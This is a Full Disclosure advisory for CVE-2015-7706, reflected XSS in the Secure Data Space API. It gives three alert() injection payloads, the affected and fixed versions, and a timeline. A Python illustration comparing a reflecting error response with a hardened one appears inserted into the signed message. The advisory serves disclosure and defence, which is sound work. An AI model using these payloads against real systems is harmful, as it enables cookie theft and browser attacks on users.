Message-ID: <23D849AFA607364BB9234C8EA130E73C0144D820@mail-essen-01.secunet.de>
Date: Wed, 9 Dec 2015 11:21:23 +0000
From: "Vogt, Thomas" <Thomas.Vogt@...unet.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] [CVE-2015-7706] SECURE DATA SPACE API Multiple Non-Persistent Cross-Site Scripting Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

secunet Security Networks AG Security Advisory

Advisory: SECURE DATA SPACE API Multiple Non-Persistent Cross-Site Scripting Vulnerabilities

1. DETAILS
----------
Product: SECURE DATA SPACE
Vendor URL: www.ssp-europe.eu
Type: Cross-site Scripting [CWE-79]
Date found: 2015-09-30
Date published: 2015-12-09
CVSSv2 Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CVE: CVE-2015-7706


2. AFFECTED VERSIONS
--------------------
All product versions (Online, Dedicated, For Linux/Windows) with
Web-Client v3.1.1-2
restApiVersion: 3.5.7-FINAL
sdsServerVersion: 3.4.14-FINAL


3. INTRODUCTION
---------------
"The highly secure business solution for easy storage, synchronization, distribution and management of data - regardless of location or device"

(from the vendor's homepage)


4. VULNERABILITY DETAILS
------------------------
Secure Data Space Web-Client v3.1.1-2 is vulnerable to multiple unauthenticated non-persistent (reflected) cross-site scripting vulnerabilities: user-supplied input sent to the API is reflected unescaped in the server's response.[0]

#1 Proof-of-Concept:
https://example.com/api/v3//public/shares/downloads/111"}<BODY%20ONLOAD%3dalert('XSS')>

#2 Proof-of-Concept (authType parameter):
POST /api/v3/auth/login
{"login":"a","password":"a","language":1,"authType":"random<script>alert(1)<\/script>random"}

#3 Proof-of-Concept (login parameter):
POST /api/v3/auth/reset_password
{"login":"random<script>alert(1)<\/script>random","language":1}
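The pattern behind #2 and #3 is an API error path that echoes a request parameter (login, authType) back into the response without encoding. The following is an added illustration, not the vendor's code or the advisory author's: it models a minimal error-response builder for the login endpoint, first in the reflecting form the advisory describes and then hardened. The parameter names come from the advisory; the function names, the allowlist contents and the response layout are assumptions made for this example.

```python
import html
import json

# Constructed sample input mirroring the advisory's PoC pattern (not a real request).
SAMPLE_INPUT = "random<script>alert(1)</script>random"

# Hypothetical allowlist of accepted authType values; placeholder names, not the product's.
ALLOWED_AUTH_TYPES = frozenset({"basic", "active_directory", "radius"})


def build_error_response_vulnerable(field, value):
    """Reflecting variant: the raw parameter value is interpolated into an
    HTML-typed error body, so any markup in `value` is rendered by the browser.
    This is the defect class described in section 4, reconstructed for illustration."""
    body = f"<p>Unknown value '{value}' for parameter {field}</p>"
    return {
        "status": 400,
        "headers": {"Content-Type": "text/html; charset=utf-8"},
        "body": body,
    }


def build_error_response_hardened(field, value):
    """Hardened variant:
    - the body is a JSON document served as application/json, so browsers do
      not render it as a page;
    - X-Content-Type-Options: nosniff stops content-type guessing;
    - a restrictive CSP makes the response inert even if it is rendered;
    - the echoed value is HTML-escaped as defence in depth, so '<script>'
      cannot survive into any HTML context a client might build from it."""
    payload = {
        "error": "invalid_parameter",
        "parameter": field,
        "value": html.escape(value, quote=True),
    }
    return {
        "status": 400,
        "headers": {
            "Content-Type": "application/json; charset=utf-8",
            "X-Content-Type-Options": "nosniff",
            "Content-Security-Policy": "default-src 'none'",
        },
        "body": json.dumps(payload),
    }


def validate_auth_type(value):
    """Preferred fix for enumerated parameters such as authType: validate against
    an allowlist and never echo a rejected value at all."""
    return value in ALLOWED_AUTH_TYPES


def reflects_raw_input(response, value):
    """Detection helper for a response review: True when the untrusted value
    appears verbatim (markup intact) in the response body."""
    return value in response["body"]


if __name__ == "__main__":
    weak = build_error_response_vulnerable("authType", SAMPLE_INPUT)
    strong = build_error_response_hardened("authType", SAMPLE_INPUT)
    print("vulnerable reflects raw input:", reflects_raw_input(weak, SAMPLE_INPUT))
    print("hardened reflects raw input:  ", reflects_raw_input(strong, SAMPLE_INPUT))
    print("authType accepted by allowlist:", validate_auth_type(SAMPLE_INPUT))
```

The `reflects_raw_input` check is the same test a reviewer applies when triaging a report like this one: send a value containing markup to each parameter and inspect whether the bytes come back unchanged and under an HTML content type. Either condition alone is a finding worth fixing; the hardened builder removes both.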


5. SECURITY RISK
----------------
The vulnerabilities can be used to temporarily embed arbitrary script code into the context of the Secure Data Space backend interface. This opens up a wide range of possible attacks, such as stealing cookies or attacking the browser and its components.


6. SOLUTION
-----------
Update to Secure Data Space Versions:
Web-Client 3.1.3 - Rev. 3 or higher with
SDS-API 3.5.7 or higher


7. REPORT TIMELINE
------------------
2015-09-30: Vulnerability discovered
2015-10-02: Vendor notified
2015-10-02: Vendor acknowledges the vulnerability
2015-10-05: CVE requested from MITRE
2015-10-05: CVE-2015-7706 assigned
2015-10-13: Vendor releases update and security advisory[0]
2015-12-09: Advisory released


8. REFERENCES / CREDITS
-----------------------
This vulnerability was discovered and researched by Thomas Vogt from secunet Security Networks AG.

[0] https://kb.ssp-europe.eu/pages/viewpage.action?pageId=12059988


secunet Security Networks AG
----------------------------
secunet is one of Germany's leading providers of superior IT security. In close dialogue with its customers – enterprises, public authorities and international organisations – secunet develops and implements high-performance products and state-of-the-art IT security solutions. Thus, secunet not only keeps IT infrastructures secure for its customers, but also achieves intelligent process optimisation and creates sustainable added value. More information about secunet can be found at:
https://www.secunet.com

-- 
secunet Security Networks AG
Kronprinzenstraße 30
45128 Essen, Germany
Local Court of Essen HRB 13615
Board of management: Dr. Rainer Baumgart (CEO), Thomas Pleines
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2
Comment: Using gpg4o v3.5.43.6457 - http://www.gpg4o.de/
Charset: utf-8
-----END PGP SIGNATURE-----

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
